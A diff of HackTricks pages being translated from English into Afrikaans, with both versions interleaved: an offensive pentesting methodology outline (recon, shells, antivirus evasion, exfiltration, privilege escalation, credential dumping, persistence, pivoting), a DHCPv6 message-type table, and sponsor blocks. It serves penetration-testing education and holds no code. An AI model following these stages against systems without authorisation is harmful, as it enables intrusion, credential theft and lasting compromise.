* [**SourceGraph**](https://sourcegraph.com/search): Soek in miljoene opslagplekke. Daar is 'n gratis weergawe en 'n ondernemingsweergawe (met 15 dae gratis). Dit ondersteun regexes.
* [**Github Soektog**](https://github.com/search): Soek deur Github. Dit ondersteun regexes.
* Dit mag ook nuttig wees om ook [**Github Kodesoektog**](https://cs.github.com/) te kyk.
* [**Gitlab Gevorderde Soektog**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Soek deur Gitlab-projekte. Ondersteun regexes.
* [**SearchCode**](https://searchcode.com/): Soek kode in miljoene projekte.
{% hint style="warning" %}
When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
Wanneer jy na lekke in 'n opslagplek soek en iets soos `git log -p` hardloop, moenie vergeet dat daar dalk **ander takke met ander commits** wat geheime bevat nie!
{% endhint %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

165
generic-methodologies-and-resources/pentesting-methodology.md
View file

@ -1,176 +1,175 @@
# Pentesting Methodology
# Pentesting Metodologie
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Pentesting Methodology
## Pentesting Metodologie
<figure><img src="../.gitbook/assets/HACKTRICKS-logo.svg" alt=""><figcaption></figcaption></figure>
_Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
_Hacktricks-logo's ontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
### 0- Physical Attacks
### 0- Fisiese Aanvalle
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/).
Het jy **fisiese toegang** tot die masjien wat jy wil aanval? Jy moet 'n paar [**truuks oor fisiese aanvalle**](../physical-attacks/physical-attacks.md) en ander oor [**ontsnapping uit GUI-toepassings**](../physical-attacks/escaping-from-gui-applications/) lees.
### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
### 1 - [Ontdekking van gasheer binne die netwerk](pentesting-network/#discovering-hosts)/ [Ontdekking van bates van die maatskappy](external-recon-methodology/)
**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test).
**Afhanklik** van of die **toets** wat jy uitvoer 'n **interne of eksterne toets** is, mag jy belangstel om **gasheerders binne die maatskappy se netwerk** (interne toets) of **bates van die maatskappy op die internet** (eksterne toets) te vind.
{% hint style="info" %}
Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide.
Let daarop dat as jy 'n eksterne toets uitvoer, sodra jy toegang tot die interne netwerk van die maatskappy verkry, moet jy hierdie gids herbegin.
{% endhint %}
### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)**
### **2-** [**Pret hê met die netwerk**](pentesting-network/) **(Intern)**
**This section only applies if you are performing an internal test.**\
Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing).
**Hierdie afdeling is slegs van toepassing as jy 'n interne toets uitvoer.**\
Voordat jy 'n gasheer aanval, verkies jy miskien om **sekere legitimasie-inligting** **uit die netwerk** te **steel** of **data** te **sniff** om passief/aktief (MitM) te leer wat jy binne die netwerk kan vind. Jy kan [**Pentesting Network**](pentesting-network/#sniffing) lees.
### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts)
### 3- [Poortskandering - Diensontdekking](pentesting-network/#scanning-hosts)
The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts).
Die eerste ding wat jy moet doen wanneer jy **kwesbaarhede in 'n gasheer soek**, is om te weet watter **dienste op watter poorte loop**. Kom ons kyk na die [**basiese gereedskap om poorte van gasheerders te skandeer**](pentesting-network/#scanning-hosts).
### **4-** [Searching service version exploits](search-exploits.md)
### **4-** [Soek diensweergawe-exploits](search-exploits.md)
Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell...
Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Dalk het jy geluk en daar is 'n exploot wat jou 'n skulpskoot kan gee...
### **5-** Pentesting Services
### **5-** Pentesting-dienste
If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.**
As daar geen fantastiese exploot vir enige lopende diens is nie, moet jy kyk vir **algemene verkeerde konfigurasies in elke lopende diens**.
**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports).
**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Soek asseblief in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is gerangskik volgens hul verstekpoorte).
**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\
Also, a small guide on how to[ **find known vulnerabilities in software**](search-exploits.md) can be found here.
**Ek wil graag 'n spesiale vermelding maak van die** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **gedeelte (omdat dit die mees omvattende is).**\
'n Klein gids oor hoe om [**bekende kwesbaarhede in sagteware te vind**](search-exploits.md) kan hier gevind word.
**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any).
**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriale en **laat weet my as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **met die diens te verbind, dit te fuzz en die antwoorde te lees** (as daar enige is).
#### 5.1 Automatic Tools
#### 5.1 Outomatiese Gereedskap
There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.**
Daar is ook verskeie gereedskap wat **outomatiese kwesbaarheidsassesserings** kan uitvoer. **Ek sal aanbeveel dat jy** [**Legion**](https://github.com/carlospolop/legion)** probeer, wat die gereedskap is wat ek geskep het en gebaseer is op die notas oor die pentesting van dienste wat jy in hierdie boek kan vind.**
#### **5.2 Brute-Forcing services**
#### **5.2 Brute-Force-dienste**
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
In sommige scenario's kan 'n **Brute-Force** nuttig wees om 'n **diens** te **kompromitteer**. [**Vind hier 'n Spiekbrief van verskillende dienste wat Brute-Force gebruik**](brute-force.md)**.**
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!\\
{% embed url="https://go.intigriti.com/hacktricks" %}
### 6- [Phishing](phishing-methodology/)
If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/):
As jy op hierdie punt nog geen interessante kwesbaarheid gevind het nie, **moet jy dalk 'n bietjie phishing probeer** om toegang tot die netwerk te kry. Jy kan my phishing-metodologie [hier](phishing-methodology/) lees:
### **7-** [**Getting Shell**](shells/)
### **7-** [**Kry 'n Skulpskoot**](shells/)
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/).
Op een of ander manier moet jy 'n **manier gevind het om kode uit te voer** op die slagoffer. Dan sou 'n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde skulpskoot te kry, baie nuttig wees](shells/).
Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\
Veral in Windows mag jy dalk hulp nodig hê om **antivirusprogramme te vermy**: [**Kyk na hierdie bladsy**](../windows-hardening/av-bypass.md)**.**\\
### 8- Inside
### 8- Binne
If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters:
As jy probleme het met die skulpskoot, kan jy hier 'n klein **samestelling van die mees nuttige opdragte** vir pentesters vind:
* [**Linux**](../linux-hardening/useful-linux-commands/)
* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
* [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
* [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
### **9 -** [**Uitlekking**](exfiltration.md)
### **9 -** [**Exfiltration**](exfiltration.md)
Jy sal waarskynlik nodig hê om **data uit die slagoffer te onttrek** of selfs iets **in te voer** (soos voorregverhoging skripte). **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.**
You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
### **10- Voorregverhoging**
### **10- Privilege Escalation**
#### **10.1- Plaaslike Voorregverhoging**
#### **10.1- Local Privesc**
As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **voorregte te verhoog**.\
Hier kan jy 'n **gids vind om voorregte plaaslik te verhoog in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
Jy moet ook hierdie bladsye oor hoe **Windows werk** nagaan:
If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\
Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
You should also check this pages about how does **Windows work**:
* [**Verifikasie, Legitieme Inligting, Token-voorregte en UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
* Hoe werk [**NTLM**](../windows-hardening/ntlm/)
* Hoe om [**legitieme inligting te steel**](broken-reference/) in Windows
* 'n Paar truuks oor [_**Aktiewe Gids**_](../windows-hardening/active-directory-methodology/)
* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
* How does [**NTLM works**](../windows-hardening/ntlm/)
* How to [**steal credentials**](broken-reference/) in Windows
* Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
**Moenie vergeet om die beste gereedskap om Windows en Linux plaaslike Voorregverhoging-paaie op te som nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
#### **10.2- Domein Voorregverhoging**
#### **10.2- Domain Privesc**
Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te ondersoek, voorregte te verhoog en volhardend te wees in 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Selfs al is dit net 'n subafdeling van 'n afdeling, kan hierdie proses **uiters delikaat** wees in 'n Pentesting/Red Team-opdrag.
### 11 - POST
#### **11**.1 - Looting
#### **11**.1 - Plundering
Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
Find here different ways to [**dump passwords in Windows**](broken-reference/).
Kyk of jy meer **wagwoorde** binne die gasheer kan vind of as jy **toegang het tot ander masjiene** met die **voorregte** van jou **gebruiker**.\
Vind hier verskillende maniere om [**wagwoorde in Windows te dump**](broken-reference/).
#### 11.2 - Persistence
#### 11.2 - Volharding
**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\
**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
**Gebruik 2 of 3 verskillende tipes volhardingsmeganismes sodat jy nie weer die stelsel hoef te benut nie.**\
**Hier kan jy 'n paar** [**volhardingstruuks in 'n aktiewe gids vind**](../windows-hardening/active-directory-methodology/#persistence)**.**
TODO: Complete persistence Post in Windows & Linux&#x20;
TODO: Voltooi volhardingspos in Windows & Linux&#x20;
### 12 - Pivoting
With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\
You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments..
Met die **versamelde legitimasie** kan jy toegang hê tot ander masjiene, of miskien moet jy **nuwe gasheer ontdek en skandeer** (begin die Pentesting Metodologie weer) binne nuwe netwerke waar jou slagoffer gekoppel is.\
In hierdie geval kan tunnelling nodig wees. Hier kan jy [**'n pos vind wat oor tunnelling praat**](tunneling-and-port-forwarding.md).\
Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy koel truuks vind om lateraal te beweeg, voorregte te verhoog en legitimasie te dump.\
Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie nuttig wees om te pivoteer in Windows-omgewings..
### MORE
### MEER
#### [Android Applications](../mobile-pentesting/android-app-pentesting/)
#### [Android-toepassings](../mobile-pentesting/android-app-pentesting/)
#### **Exploiting**
#### **Uitbuiting**
* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/)
* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Basic exploiting tools**](../exploiting/tools/)
* [**Basiese Linux-uitbuiting**](../exploiting/linux-exploiting-basic-esp/)
* [**Basiese Windows-uitbuiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Basiese uitbuitingsgereedskap**](../exploiting/tools/)
#### [**Basic Python**](python/)
#### [**Basiese Python**](python/)
#### **Crypto tricks**
#### **Krypto-truuks**
* [**ECB**](../cryptography/electronic-code-book-ecb.md)
* [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

752
generic-methodologies-and-resources/pentesting-network/README.md
View file

File diff suppressed because it is too large Load diff

72
generic-methodologies-and-resources/pentesting-network/dhcpv6.md
View file

@ -1,23 +1,21 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
### DHCPv6 vs. DHCPv4 Message Types Comparison
A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below:
### Vergelyking van DHCPv6- en DHCPv4-boodskaptipes
'n Vergelykende siening van DHCPv6- en DHCPv4-boodskaptipes word in die tabel hieronder voorgestel:
| DHCPv6 Message Type | DHCPv4 Message Type |
| DHCPv6-boodskaptipe | DHCPv4-boodskaptipe |
|:-------------------|:-------------------|
| Solicit (1) | DHCPDISCOVER |
| Advertise (2) | DHCPOFFER |
@ -26,42 +24,40 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table
| Release (8) | DHCPRELEASE |
| Information-Request (11) | DHCPINFORM |
| Decline (9) | DHCPDECLINE |
| Confirm (4) | none |
| Confirm (4) | geen |
| Reconfigure (10) | DHCPFORCERENEW |
| Relay-Forw (12), Relay-Reply (13) | none |
| Relay-Forw (12), Relay-Reply (13) | geen |
**Detailed Explanation of DHCPv6 Message Types:**
**Gedetailleerde verduideliking van DHCPv6-boodskaptipes:**
1. **Solicit (1)**: Initiated by a DHCPv6 client to find available servers.
2. **Advertise (2)**: Sent by servers in response to a Solicit, indicating availability for DHCP service.
3. **Request (3)**: Clients use this to request IP addresses or prefixes from a specific server.
4. **Confirm (4)**: Used by a client to verify if the assigned addresses are still valid on the network, typically after a network change.
5. **Renew (5)**: Clients send this to the original server to extend address lifetimes or update configurations.
6. **Rebind (6)**: Sent to any server to extend address lifetimes or update configurations, especially when no response is received to a Renew.
7. **Reply (7)**: Servers use this to provide addresses, configuration parameters, or to acknowledge messages like Release or Decline.
8. **Release (8)**: Clients inform the server to stop using one or more assigned addresses.
9. **Decline (9)**: Sent by clients to report that assigned addresses are in conflict on the network.
10. **Reconfigure (10)**: Servers prompt clients to initiate transactions for new or updated configurations.
11. **Information-Request (11)**: Clients request configuration parameters without IP address assignment.
12. **Relay-Forw (12)**: Relay agents forward messages to servers.
13. **Relay-Repl (13)**: Servers reply to relay agents, who then deliver the message to the client.
1. **Solicit (1)**: Geïnisieer deur 'n DHCPv6-kliënt om beskikbare bedieners te vind.
2. **Advertise (2)**: Deur bedieners gestuur as reaksie op 'n Solicit, wat beskikbaarheid vir DHCP-diens aandui.
3. **Request (3)**: Kliënte gebruik dit om IP-adresse of voorvoegsels van 'n spesifieke bediener aan te vra.
4. **Confirm (4)**: Gebruik deur 'n kliënt om te verifieer of die toegewysde adresse nog geldig is op die netwerk, tipies na 'n netwerkverandering.
5. **Renew (5)**: Kliënte stuur dit na die oorspronklike bediener om adreslewentye te verleng of konfigurasies op te dateer.
6. **Rebind (6)**: Gestuur na enige bediener om adreslewentye te verleng of konfigurasies op te dateer, veral wanneer geen reaksie ontvang word op 'n Renew nie.
7. **Reply (7)**: Bedieners gebruik dit om adresse, konfigurasieparameters te voorsien, of om boodskappe soos Release of Decline te erken.
8. **Release (8)**: Kliënte stel die bediener in kennis om een of meer toegewysde adresse te stop gebruik.
9. **Decline (9)**: Gestuur deur kliënte om te rapporteer dat toegewysde adresse in konflik is op die netwerk.
10. **Reconfigure (10)**: Bedieners moedig kliënte aan om transaksies vir nuwe of opgedateerde konfigurasies te begin.
11. **Information-Request (11)**: Kliënte vra konfigurasieparameters sonder IP-adres toewysing.
12. **Relay-Forw (12)**: Relay-agente stuur boodskappe na bedieners.
13. **Relay-Repl (13)**: Bedieners antwoord op relay-agente, wat dan die boodskap aan die kliënt aflewer.
## References
## Verwysings
* [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
